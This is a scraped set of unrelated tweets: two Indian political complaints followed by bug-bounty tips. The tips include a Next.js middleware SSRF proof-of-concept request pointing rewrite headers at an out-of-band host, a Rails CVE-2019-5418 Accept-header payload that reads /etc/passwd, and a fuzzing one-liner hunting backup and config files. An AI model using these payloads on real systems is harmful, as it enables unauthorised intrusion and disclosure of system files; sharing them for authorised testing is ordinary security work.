@ysjagan@ncbn actually ur hardcore fan sir after ur initiation of pension to old age peoples home, but this guy who is insulted our gods literally God Rama you are supporting him in name of criticizing govt ? there are many things to criticize govt but not this in name of Ram - u lost a vote
@AshwiniVaishnaw wow what a nice application irctc, totally worth the charges we are paying, sorry you are looting, we the looted are so happy, increasing charges but can't handle traffic on app, I missed my festival beacause of this, I will pay 100 rupees as tip for you
I just work 8 hours no stop on bypassing Post XSS and I made it.
CSRF bypass was not easy but better than XSS.
Just watch the Title. 🙃
You can find payload and tip in follow comment.
#BugBounty#bugbountytip
Nextjs SSRF in Middleware header!
✅POC:
GET / HTTP/1.1
Host: target. com
Location: http://oast. me
X-Middleware-Rewrite: http://oast. me
For more BugBounty tips join my telegram channel 👉🏼 https://t.co/J6uPf8H57o
Many bug hunters ignore blank 401 Unauthorized pages.
If you ever land on a 401 Unauthorized page (like in the image), always check the response, you might find something big.
#BugBounty#bugbountytips#appsec#latepost
If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.
Intercept the request in Burp and replace the Accept header with: `Accept: ../../../../../../../../../../etc/passwd{{` #bugbountytips
#Tips :-
1- As usual i Fuzzed all live subs using my custom short information disclosure wordlist :-
cat live-subs.txt | python3 https://t.co/4ewrAVXHk8 -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,j p,aspx,yml,yaml,rar --stdin